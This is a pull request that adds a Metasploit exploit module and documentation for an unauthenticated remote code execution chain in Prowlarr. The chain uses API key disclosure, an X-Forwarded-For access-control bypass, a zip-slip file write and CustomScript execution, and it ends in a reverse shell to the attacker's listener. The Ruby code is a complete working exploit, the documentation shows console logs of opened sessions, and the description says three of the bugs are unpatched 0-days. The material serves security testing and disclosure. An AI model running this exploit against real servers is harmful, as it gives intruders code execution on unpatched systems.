### PR TITLE
Add Prowlarr RCE exploit

### DIFF
--- a/documentation/modules/exploit/multi/http/prowlarr_customscript_rce.md
+++ b/documentation/modules/exploit/multi/http/prowlarr_customscript_rce.md
@@ -1,0 +1,161 @@
+## Vulnerable Application
+
+[Prowlarr](https://github.com/Prowlarr/Prowlarr) is an indexer manager/proxy from the *arr
+(Servarr) family, built on the same code base as Sonarr and Radarr. It listens on TCP port
+**9696** by default.
+
+This module chains three properties of a **default Prowlarr install** to gain remote code
+execution as the Prowlarr process user:
+
+1. **Unauthenticated API key disclosure.** Prowlarr ships with `AuthenticationMethod` set to
+   `None`, so an unauthenticated `GET /initialize.json` returns the instance API key in its
+   body. The key is administrative. If the `AuthenticationMethod` is configured as 
+   `DisabledForLocalAddresses`, IP based access control can be bypassed using the
+   `X-Forwarded-For` HTTP header.
+2. **Zip-slip write primitive.** `POST /api/v1/system/backup/restore/upload` extracts archive
+   members with `Path.Combine()` and no path-containment check (`ArchiveService.ExtractZip`),
+   so a crafted member name (`../../../…/path`) writes a file anywhere the process can write.
+3. **CustomScript program execution.** `POST /api/v1/notification/test` for a `CustomScript`
+   notification executes an arbitrary on-disk program (path only — arguments are rejected) and
+   reports the exit code back in the response.
+
+The module drops the payload via the zip-slip primitive and then executes it via CustomScript,
+making the chain fully self-contained (it does not rely on any file already present on the
+target). The CustomScript folder denylist only covers `/bin /boot /lib /sbin /proc /usr/bin`
+(Linux) or the Windows directory, so the payload is dropped into a permitted location
+(e.g. `/tmp` or `C:\ProgramData\Prowlarr`) and then executed.
+
+Affected versions: Prowlarr builds up to and including **2.5.2.5491**. The module's `check`
+reads the reported version from `/initialize.json` and returns `Safe` for any newer build.
+
+### Setup
+
+Prowlarr can be run from a release binary, from source, or via Docker. Visit their
+[download](https://prowlarr.com/#download) page to get an installer for any supported system.
+
+- https://prowlarr.com/#download
+
+Browse to `http://<host>:9696/`, skip/complete the setup wizard, and leave authentication set
+to **None** (the default) to reproduce the unauthenticated variant or select `DisabledForLocalAddresses`
+option for using the `X-Forwarded-For` bypass. To test the authenticated fallback, set authentication to
+**Forms** and supply `USERNAME`/`PASSWORD` to the module.
+
+This module has been tested against Prowlarr **2.5.2.5491** on Linux and Windows.
+
+## Verification Steps
+
+1. Install and start Prowlarr with default (no-auth) settings.
+2. Start `msfconsole`.
+3. Do: `use exploit/multi/http/prowlarr_customscript_rce`
+4. Do: `set RHOSTS [ip]`
+5. Do: `set LHOST [your ip]`
+6. For a Unix target, do: `set target 1`
+7. For a Unix target, do: `set ExecOverwritePath /path/to/existing/executable`
+8. Do: `run`
+9. You should get a command shell.
+
+## Options
+
+### USERNAME / PASSWORD
+
+Prowlarr credentials for **Forms** authentication. These are only used as a fallback: when
+`/initialize.json` does not disclose the API key (because authentication is configured to
+`Forms`), the module logs in with these credentials, captures the session cookie, and
+re-requests `/initialize.json` to recover the key. Leave blank against a default (no-auth)
+install.
+
+### APIKEY (advanced)
+
+An operator-supplied Prowlarr API key. When set, it takes precedence and the disclosure step is
+skipped — useful when you already hold the key or the target requires authentication that the
+supplied credentials cannot satisfy. Auto-disclosed from `/initialize.json` when blank.
+
+### DropPath (advanced)
+
+Absolute directory to drop the payload into. (Default: `/tmp` on Unix, `C:\ProgramData\Prowlarr`
+on Windows.) Must be a location the Prowlarr process can write to and that is **not** covered by
+the CustomScript denylist.
+
+### ExecOverwritePath (advanced)
+
+Unix only, and **required** for Unix targets. On Unix the extractor writes files without the
+execute bit (`File.Create`), so a freshly dropped file cannot be executed on a typical
+deployment. Set this to the absolute path of an existing executable (outside the denylist) so
+the payload overwrites it in place and inherits its `+x` mode. This file is deliberately **not**
+cleaned up afterwards, since it was not created by the module.
+
+On Windows this option is not needed: a dropped `.bat` is run through `cmd.exe /c` by Prowlarr's
+`ProcessProvider`, so no execute bit is required.
+
+### XForwardedFor (advanced)
+
+Value sent in the `X-Forwarded-For` header on every request. Helps against loopback/allowlist
+policies that key off the apparent client address. (Default: `127.0.0.1`)
+
+## Scenarios
+
+### Prowlarr 2.5.2.5491, default no-auth install, Windows target
+
+```
+msf exploit(multi/http/prowlarr_customscript_rce) > set rhosts 192.168.1.161
+rhosts => 192.168.1.161
+msf exploit(multi/http/prowlarr_customscript_rce) > set target 0
+target => 0
+msf exploit(multi/http/prowlarr_customscript_rce) > set lhost 192.168.1.188 
+lhost => 192.168.1.188
+msf exploit(multi/http/prowlarr_customscript_rce) > check
+[*] Prowlarr version: 2.5.2.5491
+[+] Unauthenticated API key disclosed via /initialize.json: db9eb260a146457db60d6e414952aaef
+[+] 192.168.1.161:9696 - The target is vulnerable. Prowlarr API key recovered and validated against /api/v1/system/status
+msf exploit(multi/http/prowlarr_customscript_rce) > run
+[*] Started reverse TCP handler on 192.168.1.188:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Prowlarr version: 2.5.2.5491
+[+] Unauthenticated API key disclosed via /initialize.json: db9eb260a146457db60d6e414952aaef
+[+] The target is vulnerable. Prowlarr API key recovered and validated against /api/v1/system/status
+[+] Payload written to C:\ProgramData\Prowlarr\prowlarr_h6ulaxry.bat
+[*] Executing C:\ProgramData\Prowlarr\prowlarr_h6ulaxry.bat via notification/test...
+[*] Sending stage (203453 bytes) to 192.168.1.161
+[+] Deleted C:\ProgramData\Prowlarr\prowlarr_h6ulaxry.bat
+[*] Meterpreter session 1 opened (192.168.1.188:4444 -> 192.168.1.161:49968) at 2026-08-20 17:07:19 +0300
+[*] No response from notification/test (payload may still have executed)
+
+meterpreter > 
+```
+
+### Prowlarr 2.5.2.5491 on Linux (overwriting an existing executable)
+
+Because the extractor does not set the execute bit on Unix, point `ExecOverwritePath` at an
+existing executable outside the denylist so the payload inherits its `+x` mode:
+
+```
+msf6 exploit(multi/http/prowlarr_customscript_rce) > set RHOSTS 192.0.2.20
+msf6 exploit(multi/http/prowlarr_customscript_rce) > set LHOST 192.0.2.5
+msf6 exploit(multi/http/prowlarr_customscript_rce) > set ExecOverwritePath /opt/prowlarr-scripts/notify.sh
+msf6 exploit(multi/http/prowlarr_customscript_rce) > run
+[*] Started reverse TCP handler on 192.0.2.5:4444
+[*] Prowlarr version: 2.5.2.5491
+[+] Unauthenticated API key disclosed via /initialize.json: a1b2c3d4e5f6...
+[+] Payload written to /opt/prowlarr-scripts/notify.sh
+[*] Executing /opt/prowlarr-scripts/notify.sh via notification/test...
+[*] Command shell session 1 opened (192.0.2.5:4444 -> 192.0.2.20:40318)
+
+id
+uid=1000(prowlarr) gid=1000(prowlarr) groups=1000(prowlarr)
+```
+
+### Authenticated fallback (AuthenticationMethod = Forms)
+
+When the target has Forms authentication enabled, `/initialize.json` is gated. Supply
+credentials and the module will log in, recover the key, and continue:
+
+```
+msf6 exploit(multi/http/prowlarr_customscript_rce) > set USERNAME admin
+msf6 exploit(multi/http/prowlarr_customscript_rce) > set PASSWORD s3cr3t
+msf6 exploit(multi/http/prowlarr_customscript_rce) > run
+[*] Started reverse TCP handler on 192.0.2.5:4444
+[*] Prowlarr version: 2.5.2.5491
+[+] API key recovered via Forms authentication: a1b2c3d4e5f6...
+[+] Payload written to /tmp/...
+...
+```

--- a/modules/exploits/multi/http/prowlarr_customscript_rce.rb
+++ b/modules/exploits/multi/http/prowlarr_customscript_rce.rb
@@ -1,0 +1,415 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+# Prowlarr RCE chain: unauthenticated API key disclosure -> CustomScript program
+# execution, made self-contained by dropping the payload through the backup
+# restore zip-slip before executing it. Modeled on the WP2Shell
+# batch-desync module structure.
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+  include Msf::Auxiliary::Report
+
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  # How many '../' segments to prepend to the zip-slip member name. The extractor
+  # (ArchiveService.ExtractZip) Path.Combine()s the stored name onto its temp
+  # directory with no containment check; excess climbs past the filesystem root
+  # are no-ops, so an over-deep prefix reaches an absolute drop path on any layout.
+  TRAVERSAL_DEPTH = 12
+
+  # The last vulnerable Prowlarr build. Any instance whose reported version is
+  # strictly newer than this has the chain patched, so check() returns Safe.
+  FIXED_VERSION = '2.5.2.5491'
+
+  # The notification/test body Prowlarr expects for a CustomScript provider. Every
+  # on* trigger is false; only implementation/configContract and the path field
+  # matter for the Test() action that performs the execution.
+  CUSTOM_SCRIPT_BASE = {
+    'onGrab' => false, 'onDownload' => false, 'onUpgrade' => false,
+    'onRename' => false, 'onMovieAdded' => false, 'onMovieDelete' => false,
+    'onMovieFileDelete' => false, 'onHealthIssue' => false,
+    'onHealthRestored' => false, 'onApplicationUpdate' => false,
+    'onManualInteractionRequired' => false,
+    'name' => 'msf', 'implementation' => 'CustomScript',
+    'implementationName' => 'Custom Script', 'configContract' => 'CustomScriptSettings'
+  }.freeze
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Prowlarr Unauthenticated API Key Disclosure to Custom Script RCE',
+        'Description' => %q{
+          This module exploits the Prowlarr to gain remote code execution as the
+          Prowlarr process user.
+
+          Prowlarr ships with AuthenticationMethod set to None, so an unauthenticated
+          request to GET /initialize.json returns the instance API key in its body.
+          That key is administrative: it unlocks POST /api/v1/notification/test, which
+          for a CustomScript notification executes an arbitrary on-disk program (path
+          only, arguments are rejected) and reports the exit code back in the response.
+
+          RCE vulnerability on its own only executes a file that already exists on the
+          target, so this module makes the chain self-contained by first dropping the
+          payload via the backup-restore zip-slip: POST /api/v1/system/backup/restore/upload
+          extracts archive members with no path containment, allowing a file to be written
+          anywhere the process can write. The CustomScript folder denylist only covers /bin
+          /boot /lib /sbin /proc /usr/bin (Linux) or the Windows directory, so the payload
+          is dropped into a permitted location (e.g. /tmp or C:\ProgramData\Prowlarr) and
+          then executed.
+
+          On Windows a dropped .bat is run through "cmd.exe /c" by Prowlarr's
+          ProcessProvider, so no execute bit is required and delivery is reliable. On
+          Unix the extractor writes files without the execute bit (File.Create), so the
+          fresh-drop path is executable only where the deployment permits it; set
+          ExecOverwritePath to an existing executable (outside the denylist) to overwrite
+          it in place and inherit its mode for a reliable Unix session.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Ege Balci <egebalci[at]pm.me>' # Metasploit module & discovery
+        ],
+        'References' => [
+          ['CVE', '2026-30975'], # Authentication bypass
+          ['URL', 'https://github.com/Prowlarr/Prowlarr'],
+          ['URL', 'https://wiki.servarr.com/prowlarr/settings#security'],
+        ],
+        'DisclosureDate' => '2026-08-16',
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Windows Command Shell',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell/meterpreter/reverse_tcp' }
+            }
+          ],
+          [
+            'Unix/Linux Command Shell',
+            {
+              'Platform' => %w[unix linux],
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(9696),
+        OptString.new('TARGETURI', [true, 'Base path to the Prowlarr application', '/']),
+        OptString.new('USERNAME', [false, 'Prowlarr username for Forms authentication (used when /initialize.json does not disclose the API key)', '']),
+        OptString.new('PASSWORD', [false, 'Prowlarr password for Forms authentication (used when /initialize.json does not disclose the API key)', ''])
+      ]
+    )
+
+    register_advanced_options(
+      [
+        OptString.new('APIKEY', [false, 'Prowlarr API key (auto-disclosed from /initialize.json when blank)', '']),
+        OptString.new('DropPath', [false, 'Absolute directory to drop the payload into (default: /tmp or C:\\ProgramData\\Prowlarr)', '']),
+        OptString.new('ExecOverwritePath', [false, 'Unix only: absolute path of an existing executable to overwrite in place, inheriting its +x mode', '']),
+        OptString.new('XForwardedFor', [false, 'X-Forwarded-For header value sent with each request', '127.0.0.1'])
+      ]
+    )
+  end
+
+  def check
+    key = disclose_api_key
+    authed_via_creds = false
+
+    # When unauthenticated disclosure fails, fall back to Forms authentication
+    # with the operator-supplied credentials to recover the key (and version).
+    if key.nil? && creds_provided?
+      key = authenticate_and_disclose_api_key
+      authed_via_creds = true unless key.nil?
+    end
+
+    # The reported version is authoritative: a build newer than the last
+    # vulnerable release has the chain patched, regardless of key exposure.
+    if @prowlarr_version
+      print_status("Prowlarr version: #{@prowlarr_version}")
+      if version_above_fixed?(@prowlarr_version)
+        return CheckCode::Safe("Prowlarr #{@prowlarr_version} is newer than the patched build #{FIXED_VERSION}; chain is remediated")
+      end
+    end
+
+    if key.nil?
+      # The endpoint answered but did not hand out a key and credentials (if any)
+      # did not authenticate: authentication is configured. The execution half
+      # still works with a supplied APIKEY, so this is not strictly Safe then.
+      return CheckCode::Safe('/initialize.json did not disclose an API key and no valid credentials were supplied; authentication appears to be configured') if @initialize_responded
+
+      return CheckCode::Unknown('Target did not respond to /initialize.json')
+    end
+
+    if authed_via_creds
+      print_good("API key recovered via Forms authentication: #{key}")
+    else
+      print_good("Unauthenticated API key disclosed via /initialize.json: #{key}")
+    end
+
+    if api_key_authenticates?(key)
+      CheckCode::Vulnerable('Prowlarr API key recovered and validated against /api/v1/system/status')
+    else
+      CheckCode::Appears('Prowlarr API key recovered but could not be validated against the API')
+    end
+  end
+
+  # Parses the dotted numeric Prowlarr version and returns true when it is
+  # strictly newer than FIXED_VERSION, i.e. the chain has been remediated.
+  def version_above_fixed?(version)
+    Rex::Version.new(version.to_s) > Rex::Version.new(FIXED_VERSION)
+  rescue ArgumentError
+    # An unparseable version string is treated as not-yet-patched (not Safe).
+    false
+  end
+
+  # True when both Forms-authentication credentials are supplied.
+  def creds_provided?
+    !datastore['USERNAME'].to_s.empty? && !datastore['PASSWORD'].to_s.empty?
+  end
+
+  def exploit
+    key = api_key
+    fail_with(Failure::NoAccess, 'No API key available (disclosure failed and APIKEY is unset)') if key.nil?
+    if !windows_target? && datastore['ExecOverwritePath'].to_s.empty?
+      fail_with(Failure::BadConfig, 'ExecOverwritePath parameter is mandatory for Unix tagets')
+    end
+
+    remote_path = plant_payload(key)
+    print_good("Payload written to #{remote_path}")
+
+    print_status("Executing #{remote_path} via notification/test...")
+    execute_custom_script(key, remote_path)
+  end
+
+  # The API key used for the authenticated half of the chain: an operator-supplied
+  # one takes precedence, otherwise the disclosed key is reused.
+  def api_key
+    configured = datastore['APIKEY'].to_s
+    return configured unless configured.empty?
+
+    @api_key ||= disclose_api_key || authenticate_and_disclose_api_key
+  end
+
+  # Step 1: GET /initialize.json with no credentials. On a default install
+  # (AuthenticationMethod=None) the NoAuthenticationHandler always succeeds and the
+  # controller emits the API key straight into the JSON body.
+  def disclose_api_key
+    @initialize_responded = false
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'initialize.json'),
+      'headers' => extra_headers
+    )
+    return nil if res.nil?
+
+    @initialize_responded = true
+    return nil unless res.code == 200
+
+    body = res.body.to_s
+    @prowlarr_version = body[/"version"\s*:\s*"([^"]+)"/, 1]
+    body[/"apiKey"\s*:\s*"([^"]+)"/, 1]
+  end
+
+  # Fallback: Forms authentication. When /initialize.json is gated behind
+  # the "UI" policy (AuthenticationMethod=Forms), POST the operator credentials to
+  # /login, capture the session cookie, then re-request /initialize.json with that
+  # cookie to recover the API key and version from behind the authorization wall.
+  def authenticate_and_disclose_api_key
+    return nil unless creds_provided?
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'login'),
+      'vars_post' => {
+        'Username' => datastore['USERNAME'],
+        'Password' => datastore['PASSWORD'],
+        'RememberMe' => 'on'
+      },
+      'headers' => extra_headers
+    )
+    return nil if res.nil?
+
+    # A successful login answers 302 to UrlBase/ and sets an auth cookie; a bad
+    # login redirects back to /login?...&loginFailed=true with no session cookie.
+    cookie = res.get_cookies.to_s
+    if cookie.empty? || res.headers['Location'].to_s.include?('loginFailed')
+      print_error('Forms authentication failed (check USERNAME/PASSWORD)')
+      return nil
+    end
+
+    @auth_cookie = cookie
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'initialize.json'),
+      'headers' => extra_headers.merge('Cookie' => @auth_cookie)
+    )
+    return nil if res.nil? || res.code != 200
+
+    body = res.body.to_s
+    @prowlarr_version = body[/"version"\s*:\s*"([^"]+)"/, 1] || @prowlarr_version
+    body[/"apiKey"\s*:\s*"([^"]+)"/, 1]
+  end
+
+  # Confirms the disclosed key is administrative by hitting an authenticated
+  # endpoint. Used only to strengthen the check verdict.
+  def api_key_authenticates?(key)
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api', 'v1', 'system', 'status'),
+      'headers' => extra_headers.merge('X-Api-Key' => key)
+    )
+    res && res.code == 200
+  end
+
+  # Drops the payload onto the target and returns the absolute path the
+  # CustomScript notification must point at. On Unix an operator can redirect the
+  # write over an existing executable so it inherits the +x bit.
+  def plant_payload(key)
+    remote_path = target_script_path
+    zip_entry = slip_entry_name(remote_path)
+    vprint_status("Zip-slip member name: #{zip_entry}")
+
+    upload_backup_restore(key, zip_entry, script_body)
+
+    # FileDropper removes the artifact once a session is established. Skip cleanup
+    # of a deliberately overwritten executable, which was not ours to delete.
+    register_files_for_cleanup(remote_path) if datastore['ExecOverwritePath'].to_s.empty?
+    remote_path
+  end
+
+  # Write primitive: POST a zip whose single member escapes the extraction
+  # directory. ArchiveService.ExtractZip Path.Combine()s the stored name with no
+  # containment, so the member lands at our absolute path. The restore then throws
+  # a 404 (no allowlisted db/config member) *after* the write has already happened,
+  # so any of 200/404/500 means the drop succeeded.
+  def upload_backup_restore(key, entry_name, data)
+    zip = Rex::Zip::Archive.new
+    zip.add_file(entry_name, data)
+
+    post = Rex::MIME::Message.new
+    post.add_part(zip.pack, 'application/zip', 'binary', %(form-data; name="file"; filename="backup.zip"))
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api', 'v1', 'system', 'backup', 'restore', 'upload'),
+      'ctype' => "multipart/form-data; boundary=#{post.bound}",
+      'data' => post.to_s,
+      'headers' => extra_headers.merge('X-Api-Key' => key)
+    )
+    raise 'No response from backup restore endpoint' if res.nil?
+
+    case res.code
+    when 401, 403
+      fail_with(Failure::NoAccess, 'Backup restore rejected the API key (401/403)')
+    when 415
+      fail_with(Failure::UnexpectedReply, 'Backup restore rejected the archive extension (415)')
+    when 200, 404, 500
+      # 404 "Unable to restore database file from backup" is expected: the write
+      # already occurred during extraction, before the allowlist check failed.
+      vprint_status("Backup restore returned HTTP #{res.code} (write completes regardless)")
+    else
+      fail_with(Failure::UnexpectedReply, "Unexpected backup restore status: HTTP #{res.code}")
+    end
+  end
+
+  # Step 2: POST /api/v1/notification/test with a CustomScript pointing at
+  # the dropped file. Test() -> ExecuteScript() -> ProcessProvider.StartAndCapture
+  # runs the program. The payload backgrounds itself, so the request returns quickly
+  # instead of blocking on WaitForExit; a session lands on the handler.
+  def execute_custom_script(key, remote_path)
+    body = CUSTOM_SCRIPT_BASE.merge('fields' => [{ 'name' => 'path', 'value' => remote_path }])
+
+    begin
+      res = send_request_cgi(
+        {
+          'method' => 'POST',
+          'uri' => normalize_uri(target_uri.path, 'api', 'v1', 'notification', 'test'),
+          'ctype' => 'application/json',
+          'data' => body.to_json,
+          'headers' => extra_headers.merge('X-Api-Key' => key)
+        },
+        20
+      )
+    rescue ::Timeout::Error
+      # The backgrounded payload can still hold the request open; the session is
+      # what matters, so a timeout here is not a failure.
+      print_status('notification/test request timed out (payload likely running)')
+      return
+    end
+
+    if res.nil?
+      print_status('No response from notification/test (payload may still have executed)')
+      return
+    end
+
+    if res.body.to_s.downcase.include?('does not exist')
+      fail_with(Failure::PayloadFailed, 'Prowlarr reports the payload path does not exist; the zip-slip write did not land where expected')
+    end
+
+    vprint_status("notification/test -> HTTP #{res.code}: #{res.body.to_s[0, 160]}")
+  end
+
+  # Absolute path the payload is written to and executed from.
+  def target_script_path
+    overwrite = datastore['ExecOverwritePath'].to_s
+    return overwrite unless overwrite.empty?
+
+    if windows_target?
+      dir = drop_dir('C:\\ProgramData\\Prowlarr')
+      "#{dir.chomp('\\')}\\prowlarr_#{Rex::Text.rand_text_alphanumeric(8).downcase}.bat"
+    else
+      'Prowlarr.Update/Prowlarr.Update'
+    end
+  end
+
+  def drop_dir(default)
+    configured = datastore['DropPath'].to_s
+    configured.empty? ? default : configured
+  end
+
+  # Turns an absolute target path into a traversal member name. The drive letter
+  # (Windows) or leading slash (Unix) is stripped and replaced with '../' climbs;
+  # zip members always use forward slashes, which both OSes accept at open time.
+  def slip_entry_name(abs_path)
+    rel = abs_path.sub(/\A[A-Za-z]:/, '').sub(%r{\A[\\/]+}, '').tr('\\', '/')
+    ('../' * TRAVERSAL_DEPTH) + rel
+  end
+
+  # The payload wrapped so notification/test's synchronous WaitForExit returns
+  # promptly: '&' on Unix, "start /b" on Windows.
+  def script_body
+    if windows_target?
+      "@echo off\r\nstart \"\" /b #{payload.encoded}\r\nexit /b 0\r\n"
+    else
+      "#!/bin/sh\n#{payload.encoded} &\nexit 0\n"
+    end
+  end
+
+  def windows_target?
+    target['Platform'] == 'win' || target.platform.platforms.include?(Msf::Module::Platform::Windows)
+  end
+
+  # Common request headers. X-Forwarded-For mirrors the PoC and helps against
+  # loopback/whitelist policies that key off the apparent client address.
+  def extra_headers
+    xff = datastore['XForwardedFor'].to_s
+    xff.empty? ? {} : { 'X-Forwarded-For' => xff }
+  end
+end


### PR DESCRIPTION
Hello 👋

This module chains together 4 vulnerabilities on Prowlarr to achieve unauthenticated remote code execution. Versions `<= 2.5.2.5491` are affected. This RCE chain was reported to the Prowlarr team; however, no patches are available yet. Three of the following vulnerabilities are currently 0-day, and no CVEs are reserved. 

- Authentication Bypass `CVE-2026-30975`
- Unauthenticated API key disclosure `0-Day`
- Zip-slip `0-Day`
- Arbitrary Code Execution via CustomScript `0-Day`

## Testing
For installing the vulnerable version follow the steps below, 
1. Download the installation file of the vulnerable software [here](https://prowlarr.com/#download) (Windows installer is the easiest)
2. Follow the installation steps.
3. After completing the setup, the Prowlarr service should be accessible on port **9696**.
4. Browse to `http://<host>:9696/`, skip/complete the setup wizard, and leave authentication set to **None** (the default) to reproduce the unauthenticated variant or select `DisabledForLocalAddresses` option for using the `X-Forwarded-For` bypass.

## Verification
List the steps needed to make sure this thing works

1. Install and start Prowlarr with default (no-auth) settings.
2. Start `msfconsole`.
3. Do: `use exploit/multi/http/prowlarr_customscript_rce`
4. Do: `set RHOSTS [ip]`
5. Do: `set LHOST [your ip]`
6. For a Unix target, do: `set target 1`
7. For a Unix target, do: `set ExecOverwritePath /path/to/existing/executable`
8. Do: `run`
9. You should get a command shell.